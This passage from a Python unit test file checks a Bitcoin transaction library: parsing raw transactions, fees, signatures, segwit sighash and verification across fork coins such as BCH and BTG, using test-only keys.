raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(len(tx.tx_outs), 2)
want = 32454049
self.assertEqual(tx.tx_outs[0].amount, want)
want = unhexlify('76a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac')
self.assertEqual(tx.tx_outs[0].script_pubkey.serialize(), want)
want = 10011545
self.assertEqual(tx.tx_outs[1].amount, want)
want = unhexlify('76a9141c4bc762dd5423e332166702cb75f40df79fea1288ac')
self.assertEqual(tx.tx_outs[1].script_pubkey.serialize(), want)
def test_parse_locktime(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.locktime, 410393)
def test_der_signature(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
want = b'3045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed'
der, hash_type = tx.tx_ins[0].der_signature()
self.assertEqual(hexlify(der), want)
self.assertEqual(hash_type, SIGHASH_ALL)
def test_sec_pubkey(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
want = b'0349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278a'
self.assertEqual(hexlify(tx.tx_ins[0].sec_pubkey()), want)
def test_serialize(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.serialize(), raw_tx)
def test_input_value(self):
tx_hash = 'd1c789a9c60383bf715f3f6ad9d14b91fe55f3deb369fe5d9280cb1a01793f81'
index = 0
want = 42505594
tx_in = TxIn(
prev_tx=unhexlify(tx_hash),
prev_index=index,
script_sig=b'',
sequence=0,
)
self.assertEqual(tx_in.value(), want)
def test_input_pubkey(self):
tx_hash = 'd1c789a9c60383bf715f3f6ad9d14b91fe55f3deb369fe5d9280cb1a01793f81'
index = 0
tx_in = TxIn(
prev_tx=unhexlify(tx_hash),
prev_index=index,
script_sig=b'',
sequence=0,
)
want = unhexlify('76a914a802fc56c704ce87c42d7c92eb75e7896bdc41ae88ac')
self.assertEqual(tx_in.script_pubkey().serialize(), want)
def test_fee(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.fee(), 40000)
raw_tx = unhexlify('010000000456919960ac691763688d3d3bcea9ad6ecaf875df5339e148a1fc61c6ed7a069e010000006a47304402204585bcdef85e6b1c6af5c2669d4830ff86e42dd205c0e089bc2a821657e951c002201024a10366077f87d6bce1f7100ad8cfa8a064b39d4e8fe4ea13a7b71aa8180f012102f0da57e85eec2934a82a585ea337ce2f4998b50ae699dd79f5880e253dafafb7feffffffeb8f51f4038dc17e6313cf831d4f02281c2a468bde0fafd37f1bf882729e7fd3000000006a47304402207899531a52d59a6de200179928ca900254a36b8dff8bb75f5f5d71b1cdc26125022008b422690b8461cb52c3cc30330b23d574351872b7c361e9aae3649071c1a7160121035d5c93d9ac96881f19ba1f686f15f009ded7c62efe85a872e6a19b43c15a2937feffffff567bf40595119d1bb8a3037c356efd56170b64cbcc160fb028fa10704b45d775000000006a47304402204c7c7818424c7f7911da6cddc59655a70af1cb5eaf17c69dadbfc74ffa0b662f02207599e08bc8023693ad4e9527dc42c34210f7a7d1d1ddfc8492b654a11e7620a0012102158b46fbdff65d0172b7989aec8850aa0dae49abfb84c81ae6e5b251a58ace5cfeffffffd63a5e6c16e620f86f375925b21cabaf736c779f88fd04dcad51d26690f7f345010000006a47304402200633ea0d3314bea0d95b3cd8dadb2ef79ea8331ffe1e61f762c0f6daea0fabde022029f23b3e9c30f080446150b23852028751635dcee2be669c2a1686a4b5edf304012103ffd6f4a67e94aba353a00882e563ff2722eb4cff0ad6006e86ee20dfe7520d55feffffff0251430f00000000001976a914ab0c0b2e98b1ab6dbf67d4750b0a56244948a87988ac005a6202000000001976a9143c82d7df364eb6c75be8c80df2b3eda8db57397088ac46430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.fee(), 140500)
def test_sig_hash(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
tx.testnet = True
hash_type = SIGHASH_ALL
want = int('27e0c5994dec7824e56dec6b2fcb342eb7cdb0d0957c2fce9882f715e85d81a6', 16)
self.assertEqual(tx.sig_hash(0, hash_type), want)
def test_verify_input1(self):
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertTrue(tx.verify_input(0))
def test_verify_input2(self):
raw_tx = unhexlify('0100000001868278ed6ddfb6c1ed3ad5f8181eb0c7a385aa0836f01d5e4789e6bd304d87221a000000db00483045022100dc92655fe37036f47756db8102e0d7d5e28b3beb83a8fef4f5dc0559bddfb94e02205a36d4e4e6c7fcd16658c50783e00c341609977aed3ad00937bf4ee942a8993701483045022100da6bee3c93766232079a01639d07fa869598749729ae323eab8eef53577d611b02207bef15429dcadce2121ea07f233115c6f09034c0be68db99980b9a6c5e75402201475221022626e955ea6ea6d98850c994f9107b036b1334f18ca8830bfff1295d21cfdb702103b287eaf122eea69030a0e9feed096bed8045c8b98bec453e1ffac7fbdbd4bb7152aeffffffff04d3b11400000000001976a914904a49878c0adfc3aa05de7afad2cc15f483a56a88ac7f400900000000001976a914418327e3f3dda4cf5b9089325a4b95abdfa0334088ac722c0c00000000001976a914ba35042cfe9fc66fd35ac2224eebdafd1028ad2788acdc4ace020000000017a91474d691da1574e6b3c192ecfb52cc8984ee7b6c568700000000')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertTrue(tx.verify_input(0))
def test_sign_input(self):
private_key = PrivateKey(secret=8675309)
tx_ins = []
prev_tx = unhexlify('0025bc3c0fa8b7eb55b9437fdbd016870d18e0df0ace7bc9864efc38414147c8')
tx_ins.append(TxIn(
prev_tx=prev_tx,
prev_index=0,
script_sig=b'',
sequence=0xffffffff,
))
tx_ins[0]._value = 110000000
tx_ins[0]._script_pubkey = Script.parse(private_key.point.p2pkh_script())
tx_outs = []
h160 = Tx.get_address_data('mzx5YhAH9kNHtcN481u6WkjeHjYtVeKVh2')['h160']
tx_outs.append(TxOut(amount=int(0.99*100000000), script_pubkey=p2pkh_script(h160)))
h160 = Tx.get_address_data('mnrVtF8DWjMu839VW3rBfgYaAfKk8983Xf')['h160']
tx_outs.append(TxOut(amount=int(0.1*100000000), script_pubkey=p2pkh_script(h160)))
tx = Tx(
version=1,
tx_ins=tx_ins,
tx_outs=tx_outs,
locktime=0,
testnet=True,
)
self.assertTrue(tx.sign_input(0, private_key, SIGHASH_ALL))
def test_is_coinbase(self):
raw_tx = unhexlify('01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff5e03d71b07254d696e656420627920416e74506f6f6c20626a31312f4542312f4144362f43205914293101fabe6d6d678e2c8c34afc36896e7d9402824ed38e856676ee94bfdb0c6c4bcd8b2e5666a0400000000000000c7270000a5e00e00ffffffff01faf20b58000000001976a914338c84849423992471bffb1a54a8d9b1d69dc28a88ac00000000')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertTrue(tx.is_coinbase())
def test_coinbase_height(self):
raw_tx = unhexlify('01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff5e03d71b07254d696e656420627920416e74506f6f6c20626a31312f4542312f4144362f43205914293101fabe6d6d678e2c8c34afc36896e7d9402824ed38e856676ee94bfdb0c6c4bcd8b2e5666a0400000000000000c7270000a5e00e00ffffffff01faf20b58000000001976a914338c84849423992471bffb1a54a8d9b1d69dc28a88ac00000000')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.coinbase_height(), 465879)
raw_tx = unhexlify('0100000001813f79011acb80925dfe69b3def355fe914bd1d96a3f5f71bf8303c6a989c7d1000000006b483045022100ed81ff192e75a3fd2304004dcadb746fa5e24c5031ccfcf21320b0277457c98f02207a986d955c6e0cb35d446a89d3f56100f4d7f67801c31967743a9c8e10615bed01210349fc4e631e3624a545de3f89f5d8684c7b8138bd94bdd531d2e213bf016b278afeffffff02a135ef01000000001976a914bc3b654dca7e56b04dca18f2566cdaf02e8d9ada88ac99c39800000000001976a9141c4bc762dd5423e332166702cb75f40df79fea1288ac19430600')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertIsNone(tx.coinbase_height())
def test_sig_hash_bip143(self):
raw_tx = unhexlify('0100000001fd5145175fafdee6d20ac376e376cf26d933848ba5aa177d0d163a462fb3f183010000006b483045022100f49a17e80098bc057e319b890bdc42fe7224e7f6beb69a650102f802239be154022069742f504fdd52906c14d0d18ff0808e01146813775602163ec10d419270c1c541210223f1c80f382f086e2af7ad9d05227d94b6cf292596b9853f04a91194048f9048ffffffff0236820100000000001976a914dc10e999a5f18eb510feec09206d1812fa24a9c288ac5c058049000000001976a91421704f258089af191df1a4abed2b48ec11d6063e88ac00000000')
stream = BytesIO(raw_tx)
tx = BCHTx.parse(stream)
tx_in = tx.tx_ins[0]
raw_tx2 = unhexlify('010000000185037eb5531900f2f450e55cd950c509310229c0444e318a8811eecfa3b5c183010000006b483045022100f4a6e308ff7846bd19d394ec1b7263e051f2a60e6819feb006cdb9047bdd21a502206d969dfb5dfee3e53ed1a79b441d1cc2b7b8fe945ac7507c3b5e180565fbaead4121037765d8921f9559a6f03d620a1687a57e5b4ecb9efa5b41fc44555da0a376f81affffffff021ffc6c00000000001976a914fe1f6bea216c790c30d07f52966850268a3f90a788acfc8b8149000000001976a9142563b8536a228ec866e1c1084044a7730e53758888ac00000000')
stream2 = BytesIO(raw_tx2)
tx2 = BCHTx.parse(stream2)
tx_in._value = tx2.tx_outs[1].amount
tx_in._script_pubkey = tx2.tx_outs[1].script_pubkey
der, hash_type = tx_in.der_signature()
sec = tx_in.sec_pubkey()
sig = Signature.parse(der)
point = S256Point.parse(sec)
z = tx.sig_hash_bip143(0, hash_type)
self.assertTrue(point.verify(z, sig))
self.assertTrue(tx.verify_input(0))
self.assertTrue(tx.verify())
def test_segwit(self):
raw_tx = unhexlify('01000000000101db6b1b20aa0fd7b23880be2ecbd4a98130974cf4748fb66092ac4d3ceb1a5477010000001716001479091972186c449eb1ded22b78e40d009bdf0089feffffff02b8b4eb0b000000001976a914a457b684d7f0d539a46a45bbc043f35b59d0d96388ac0008af2f000000001976a914fd270b1ee6abcaea97fea7ad0402e8bd8ad6d77c88ac02473044022047ac8e878352d3ebbde1c94ce3a10d057c24175747116f8288e5d794d12d482f0220217f36a485cae903c713331d877c1f64677e3622ad4010726870540656fe9dcb012103ad1d8e89212f0b92c74d23bb710c00662ad1470198ac48c43f7d6f93a2a2687392040000')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
tx.tx_ins[0]._script_pubkey = Script.parse(unhexlify('a9144733f37cf4db86fbc2efed2500b4f4e49f31202387'))
tx.tx_ins[0]._value = 1000000000
want = b'b0287b4a252ac05af83d2dcef00ba313af78a3e9c329afa216eb3aa2a7b4613a'
self.assertEqual(hexlify(tx.hash_prevouts()), want)
want = b'18606b350cd8bf565266bc352f0caddcf01e8fa789dd8a15386327cf8cabe198'
self.assertEqual(hexlify(tx.hash_sequence()), want)
want = b'de984f44532e2173ca0d64314fcefe6d30da6f8cf27bafa706da61df8a226c83'
self.assertEqual(hexlify(tx.hash_outputs()), want)
want = b'01000000b0287b4a252ac05af83d2dcef00ba313af78a3e9c329afa216eb3aa2a7b4613a18606b350cd8bf565266bc352f0caddcf01e8fa789dd8a15386327cf8cabe198db6b1b20aa0fd7b23880be2ecbd4a98130974cf4748fb66092ac4d3ceb1a5477010000001976a91479091972186c449eb1ded22b78e40d009bdf008988ac00ca9a3b00000000feffffffde984f44532e2173ca0d64314fcefe6d30da6f8cf27bafa706da61df8a226c839204000001000000'
self.assertEqual(hexlify(tx.sig_hash_preimage_bip143(0, 1)), want)
self.assertEqual(tx.serialize(), raw_tx)
self.assertTrue(tx.verify())
raw_tx = unhexlify('01000000000101712e5b4e97ab549d50ca60a4f5968b2225215e9fab82dae4720078711406972f0000000017160014848202fc47fb475289652fbd1912cc853ecb0096feffffff0232360000000000001976a914121ae7a2d55d2f0102ccc117cbcb70041b0e037f88ac10270000000000001976a914ec0be50951651261765cfa71d7bd41c7b9245bb388ac024830450221009263c7de80c297d5b21aba846cf6f0a970e1d339568167d1e4c1355c7711bc1602202c9312b8d32fd9c7acc54c46cab50eb7255ce3c012214c41fe1ad91bccb16a13012102ebdf6fc448431a2bd6380f912a0fa6ca291ca3340e79b6f0c1fdaff73cf54061075a0700')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.serialize(), raw_tx)
self.assertTrue(tx.verify())
raw_tx = unhexlify('020000000001081446a37707dc7ea5cf61806dd904f4ef4f0875a1ae0677cb2558af8154294db5070000001716001420b884a7838912a368ed6529f920edf39c0eabf6ffffffff3ec88712de2bc1812829a407e22c477e416df9437ef18e15c80cb6d415928f18000000001716001427dbca14f538846467a4b5ba0bc08014854db9c5ffffffff3176ffed5b1de43807d223216a82c6f68637ab7dbe2b585e184341f3a7d594cb0000000017160014d8f1c025669899719d87b3b21ca8e8fc2b139f15ffffffff54d8e606273ca57a3a559f3ce56619ad473701e19e5d2b4346d5082f47656fc3000000006b4830450221009447ef2f0ffb9e133f351161c2c3885f43c15d4b7682d7188011b07658537355022044c76b845efe00f1984d7c375a6af94280b4464917ea8274fa6eafa614647c83012102282deea2ecd8a0807ccfd51f9df5e1fd4bc9505b7e7e41ba922964ed59078c0cffffffff05392ab19a8d84d9db21d01d83bb2fc9c78a7b9555a7900a9b7b314a4f52d6990b00000017160014602845b585bdbb8a3e0cb6f7d2e54b50da1dc2caffffffff3ea224000c9023d3329f9fe10f0980deb05df5a089a77b8bda326476d0676b60000000006a4730440220499c7c60669b3b2f6e7a3535aa695d26c879cbf904c2a4d27abe8e9ce603b21b022022b126f3a3eb3800d56fc4b120e62b2bf8656160f42477709ab94c08488a57440121033fd51607ad8c7b20678ce90dc00e67305468dc5359f10d2b8e12bde1aad6b70affffffff2b380df0036fb56ce6abb604100c4475c44c5f78eb1ccb7eb3c8c68d4c07964401000000171600141222eb5661b5239b625a66596bf51c057dd6e36effffffff044f03ae06fe2cf464f0c06621f005f8584b17c83df3c274cc0532d92b0b4cbf030000001716001430128f1e88752aff630253a09502433615591817ffffffff0ae7546101000000001976a914fe129300f08787df2433ea1f179855ad631f521588ac7060b506000000001976a9141e52cea2417015d68a395961ded221e8773af94c88acfa331d000000000017a914718a41bebbfcfe7fc6f1713566e0e494062ccfe1877e905900000000001976a914d516332ccf4513a86e02103cb3723fcc4cc6d10488acf1523f000000000017a9149a1f25e8b22e06b94b36992690173927663e7a67873ca02f00000000001976a914781bc2683d9b8ca38a4805a2b3a3209c607f643988ac5b1fa5020000000017a914add3e0a14b450f7d68ec264d6c3eb3c4948ec611875e6f1800000000001976a91483449d8cfe9fdfbb16cb5632ca7b2ebb63ae90ab88aca342bc000000000017a914087d0060b24f68430474c5d048990158fd1ca7fb8700204e00000000001976a9147d79d91ffcc4d2ab74da606d22e60b794526244388ac0247304402200f6479c8a098d0d32e80023a6841273cb3bf2d9190c4ca9efed2d5a4b453d510022026c34fd235ba7a5e4f4dff2470b97b218672694738766fd3a6e562b1d73e9eff01210224af4a7a92c9967f3683fa3e0206daa5b928a84b35cae4de7427b0c0b1f7e0bf02473044022052c438047e0e7b44ff7c4e2072b79a69738420b9355d13a5c9d1094e3532968e02204eaaf65f26e11e346d23b39102194bed1ebc2c3e37521a9f00509616449fdb130121023638167aa99a910f4a4275b5bb628cc26facbfa5bf31f5cf2a6d554bc8db606002473044022014fa5476e6d80665113cc2b2555cc9ccb1c18333118a49a353dd1a932986ecab022035cdde8443957562510f0ee52e8ee400ca27f56785266ce4615ace4d1afb7c210121034ea7a539ad591d853b3ed679e5cf212801f063f0540ce1b9ee1085a2f6eac6aa0002483045022100ef9b368dd2498909df5cadde878c6ef708dfcbc3f0ca603c127bf531baff2be902201dd537223c6e67f5776b4ecf1a2baacfc0e198600431016a2f6e4928e2efc254012102e6b2a2dae2045633814c126ebeceebc036fc55a40f7aa56d03633b4f3cb407bf0002483045022100e426e718989f4141767bb5861d6d66c5b3d4b76bee849e8a05d0def1399b9a0c0220256b3c2e7e7e7e2cf7481e9e37feb6b1a877f13e396071f5c30af78557f89c0d012102d82c01881a7458f936b4c551e48adee3949585f842ece86a77e14c0976119ec602483045022100f4e5291e42dbe421eda30d670caf284b7d675ed439df64371d14d9dac028646502202e04dcea07a7d8bfc59f95172c87cdf9f2fa4f97559971cd08e2efd50cf3acb4012103a5c6e168f4acf6470b018fb9b86ef9ae58ba1834c3646a2ed1bebbfb94acf83500000000')
stream = BytesIO(raw_tx)
tx = Tx.parse(stream)
self.assertEqual(tx.serialize(), raw_tx)
self.assertTrue(tx.verify())
def test_bch(self):
raw = unhexlify('01000000021128db2baee531447170d0916a553b07e8912a1c47e4e174afc7bfdf4afd3185010000008a4730440220211497a5609bcdeba19552e54a96b63f153656ecc5ba997ca8174a8102b4d8c602206a079685c36b46902ba366e112ba17b44e79dc8cb9b3b4792848c4f2f97192ae41410456e1306c1068ff31f1e8dbdd0b976092b1b4903b1a8ee3fe878508fa7f584d399b3a0a48c4215cded444257ce358b04720c62c73d5a8c0bb4ad261096baaaec4ffffffffedc5aa7918bd8beb801277177b3b7d15924682358e6342570be84f91e6d11835010000008a47304402203b0ee7aedaa5237325caee0433eeaba2ce2aff53d5c09c91bc2a79c51500f0b702201ecfd381d027a0d08b2409691bc73c16e626cbcd3c80a9980fa1e41b7a11cb5041410456e1306c1068ff31f1e8dbdd0b976092b1b4903b1a8ee3fe878508fa7f584d399b3a0a48c4215cded444257ce358b04720c62c73d5a8c0bb4ad261096baaaec4ffffffff01ac3ae60e000000001976a91441e904a482e61766cec490a8a5f3fbcf6bffdb2a88ac00000000')
stream = BytesIO(raw)
tx = BCHTx.parse(stream)
self.assertTrue(tx.verify())
raw_tx = unhexlify('01000000066f267f335a54abf404c66a7a6e9ed3d77566a09ce11632f57029a677f42c6095000000006b483045022100fb0b16699c9b0984345c7860e208c04694aaa5117c8306082cfafc58b53e489a02203cd53408f1f8c8ff29701a9d1f6960b2dc5e1039f0eea949c5a886ac367e1e38412102fdcae0e5a55b20c8d3cbdf451d39f6d47daa50f884ed0ffcf0ae0adfeec4abb9ffffffff4ceb6a2894b19b96fedd543750bf7307805a2f6ca189c8c42d1abbe2930235fa000000006a4730440220794c269d519b567aa694de6dcde1d09dffa30b69dc18a619ce9ea65f239899150220156394f70f405c0710851490b9f21dc8a23931fbdc8a70ea51f73e9b00274a5c412103b708cd0b3329cff03611b0155384d1d4f40cb3aa30f82d8f4a34da044c868058ffffffff15053ac5123a25e0adf0ed998dfb710fff827861ac1a4c6601be8034179350ab000000006a473044022020e7b448318fa44b977d557b639aaf3a9666cf6d8dd446bd7812e752ddfcd1d302207159d22c2e379b77b0514b8e0767d0e9fff7063a659c268d605be436f65703884121031a97eb1664ceffa32988f7ea7c6726d681f1385b9765be1a40d6083fba4e6c69ffffffff2e1fb2ad94461104b147ffe95d0534eb98495c45831547b70eae652ac6cf52d0000000006b483045022100b0ce5496d51673f82430eee24c57f7f2f2631e5b9b32c78bbd79e1cbf3f6297b02201c807ecfa86c1c493e83f1235a19e4426da651e8f76c2f4b41ceebf1222a9291412102e4aa3631fd0b4a877c7c0a040b8211636f743c392ce17e6f266beb1b62490af9ffffffff311368bcf1bac2ae2e906bd7e84e9b45da861a63154ae5c3d69840f65486ba86000000006b483045022100d5f63c5284604eefb942fa9710f8d5b5bccf431e63c496237a0c41eb5c6debf102202bda17f3b7406b9c41f44c7377261413cfa144489a70a40e9e9126b3e7f2fc734121032e413587a71814365b7912eac3a052d8ac0c5f2351d3d84863a02bafefd41f19ffffffff2e9e219c5a68079891a8d2b00bfcf3772fa605997773c2c516bb5ac99aa8ee06000000006a47304402207b6e0d96d0ce538fb54fcb1731a35632b6e40efde834ce45ee22f0c0f5baa886022009327de37e3fb657af29161d265db558869c09e295e84ddb2f686a492db0015a41210389c44f336f7c8cc3096f8f40bc5bdbffea24da9e26649dbe6b862d7d369698d0ffffffff0102b84f05000000001976a9145c52250125494685f133df34f47fb88799b2903588ac00000000')
stream = BytesIO(raw_tx)
tx = BCHTx.parse(stream)
inputs = (
('18Lk6CB2WSpc4BVbxWhZrxLaYaJA2XVtyU', 24285000),
('13xY6E2tnBC5eGFCkayAUdVVcuGkFPoebJ', 824730),
('1BjFmsA4StiDa9xjAwahFXNpzR6SfXxBFD', 7583000),
('1Nn5QirD9iFT5kSF35XN8E3SX3SJM1daPL', 13150000),
('1HE8AdXHkP2bbnKmgENET4iyCHncP7rd7G', 32850000),
('1J3BgNjoqeR5JhHzC2rgorzBXTmdbmYcau', 10422900),
)
for i, data in enumerate(inputs):
addr, value = data
tx_in = tx.tx_ins[i]
i += 1
h160 = Tx.get_address_data(addr)['h160']
tx_in._value = value
tx_in._script_pubkey = Script.parse(p2pkh_script(h160))
self.assertTrue(tx.verify())
def test_btg(self):
raw = unhexlify('0200000002618c8a9c486a961e57e99c8a249cd43937f4447083a3c9589cc30eebb38e0d8d010000006a473044022075173f771f997652e94c461a22147c1154336fb498cfb2cc4a5af5d0b94f43960220322a22f4290a580e3f0953cff7ba548c63d0829936413fc805a802bb005881014121034a66bef852adc6fa774d95a7ebef5a2b18e3b61d05e23130b9a4ad6fffa536bdfeffffff8afa4e2c895facf0354e66910cf6ed02e8549eaad8926688dedb754781e118b2010000006a473044022025575c1912ae89a29a639fca6ac3d72423214dbff62afd7a48a358464585da0d022068706419a61e60a571c084797177856f514a9ecd8d8df2f2e113c5daa4e560f041210259316ac5f9f5fecb6597929de0cb05739432b067b79444a57adbf9e413fc61defeffffff021f7a1b1d000000001976a914dd23a9af489c2b1e08a13122aac1a06752df8ed188ac7af11400000000001976a914bd31883c773888a0f99e16deeff118ff0ec15d0888ac7dbf0700')
stream = BytesIO(raw)
tx = BTGTx.parse(stream)
tx.tx_ins[0]._value = 488779958
h160 = BTGTx.get_address_data('GWmfLaQ7ZKmUX7rmW63u63b9ghbuwr9yN1')['h160']
tx.tx_ins[0]._script_pubkey = Script.parse(p2pkh_script(h160))
tx.tx_ins[1]._value = 969979
h160 = BTGTx.get_address_data('GgvZtZ8aV1UhTgLzzRbXVLrwwVoJL9WywW')['h160']
tx.tx_ins[1]._script_pubkey = Script.parse(p2pkh_script(h160))
self.assertTrue(tx.verify())
def test_bcd(self):
raw = unhexlify('0c00000025b6923ff3cb4264408ed5d5cca3cc41c7586820c95aeec24503d5a11418dd2501d0b96dd7ff4e3de5113ca48cefcbb4083541154c75e51a2e7b09879301a71cc5000000006a47304402201e10a7a5d03235236475feede87c57a38a79ab3399aafe90fcb9c47de525603b0220547fd8897c0e9d318dbe6c350c784eeb31b3cb18fbf550516fcc0168c22810e5012103e97b79d9aa924bfcea2915235ebc5b4cc7db5414e63ccb61ed2d197e29cb9fdbffffffff0280cb7831000000001976a91449664b451210fc8b3c055ce5606f0d8199ceae6788ac5a434600000000001976a9148868e1942ff8445f2e3791d9fa1dc881b8aec08c88ac00000000')
stream = BytesIO(raw)
tx = BCDTx.parse(stream)
tx.tx_ins[0]._value = 834614762
h160 = BCDTx.get_address_data('1MtE3mjo4AByFJSB8bAuVUHeqb21brLKJ5')['h160']
tx.tx_ins[0]._script_pubkey = Script.parse(p2pkh_script(h160))
self.assertTrue(tx.verify())
def test_sbtc(self):
raw = unhexlify('0100000002a81e0df5218289cc4ee761a1747b494990cc1f5b2dc84f0542ad6f28f69d5f4c040000006b483045022100aaf4a05870a9a8ca79a612600936d27bbfce97ebf4e2fe4d311e40c4b78ca6550220175ecff50679023ffce58019ee711784229b8c738b85093d34b4ccc72592087341210313910dbdf4ecfc35f6193b8f6484ab554587f6c7e5e376351e0978e7433d8c80ffffffff17a8282d91fccc03f7d422f5b124427c09c391aca3743cc1e04b7afbe8e282b9010000006b483045022100ef1c6716e19cf7de6eea6cb6468ce7efb2480d72795dc2066d7b1ea823830a6102204cbcdc56e420d9a88a650c126375815443636a0d628096b1439814445156bb0a41210313910dbdf4ecfc35f6193b8f6484ab554587f6c7e5e376351e0978e7433d8c80ffffffff01a05d5804000000001976a9144c3496d9f64847b45318baa5afd6b515c76013cf88ac00000000')
stream = BytesIO(raw)
tx = SBTCTx.parse(stream)
tx.tx_ins[0]._value = 67700000
h160 = SBTCTx.get_address_data('14fR5g6ypHFx3F9mJwiHaHXkMs5YjS4fJZ')['h160']
tx.tx_ins[0]._script_pubkey = Script.parse(p2pkh_script(h160))
tx.tx_ins[1]._value = 5300000
tx.tx_ins[0]._script_pubkey = Script.parse(p2pkh_script(h160))
self.assertTrue(tx.verify())
def test_b2x_sign(self):
# Generated from ./bitcoin2x-qt -regtest
wif = 'cVC6z7gnezHZut5yyuCX3x79tfcbauCWiFcBY92Vg4crfu4Maa5B'
prev_tx = 'b6d073333c1a8e4360b1e2c7fa2ed6b67b74272ad7fabf52a4e4732df5f47dbd'
prev_index = 0
prev_value = 5000000000
destination = 'mrVqpGm7F5MVCwsP4s3fQEN2GAaykJoTu4'
amount = 4996000000
priv_key = PrivateKey.parse(wif)
prev_script_pubkey = B2XTx.get_address_data(priv_key.point.address())['script_pubkey'].serialize()
